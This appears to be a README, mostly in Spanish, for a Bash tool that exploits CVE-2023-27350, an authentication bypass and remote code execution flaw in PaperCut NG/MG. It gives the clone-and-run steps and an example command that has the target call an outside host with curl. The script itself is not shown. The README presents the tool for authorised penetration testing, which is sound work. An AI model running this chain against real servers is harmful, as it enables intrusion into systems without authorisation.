
PaperCut NG/MG Authentication Bypass and Remote Code Execution (RCE) Exploit Tool: herramienta de explotación de omisión de autenticación y ejecución remota de código (RCE) en PaperCut NG/MG. Una implementación independiente en Bash de la cadena de explotación de PaperCut, que incluye soporte opcional de proxy, elevación automatizada de sesión e inyección dinámica de comandos a través del motor de scripting de impresión. Diseñada para auditoría de seguridad y pruebas de penetración autorizadas.

Un exploit Bash simplificado para CVE-2023-27350. Este script automatiza el bypass de autenticación, la preparación del entorno y la inyección de comandos a través del motor de scripts de impresora de PaperCut.


# Clone the repository
git clone https://github.com/dezso-dfield/CVE-2023-27350.git
# Enter the directory
cd CVE-2023-27350
# Make the script executable
chmod +x rce.sh
# Run the exploit (Example with Proxy)
./rce.sh -u http://10.129.238.16:9191 -x http://10.129.238.16:3128 -c "curl http://10.10.15.82:8000/rce"
-u : URL objetivo (p. ej., http://10.129.x.x:9191)-c : Comando a ejecutar (entre comillas)-x : (Opcional) URL de proxy (p. ej., http://10.129.x.x:3128)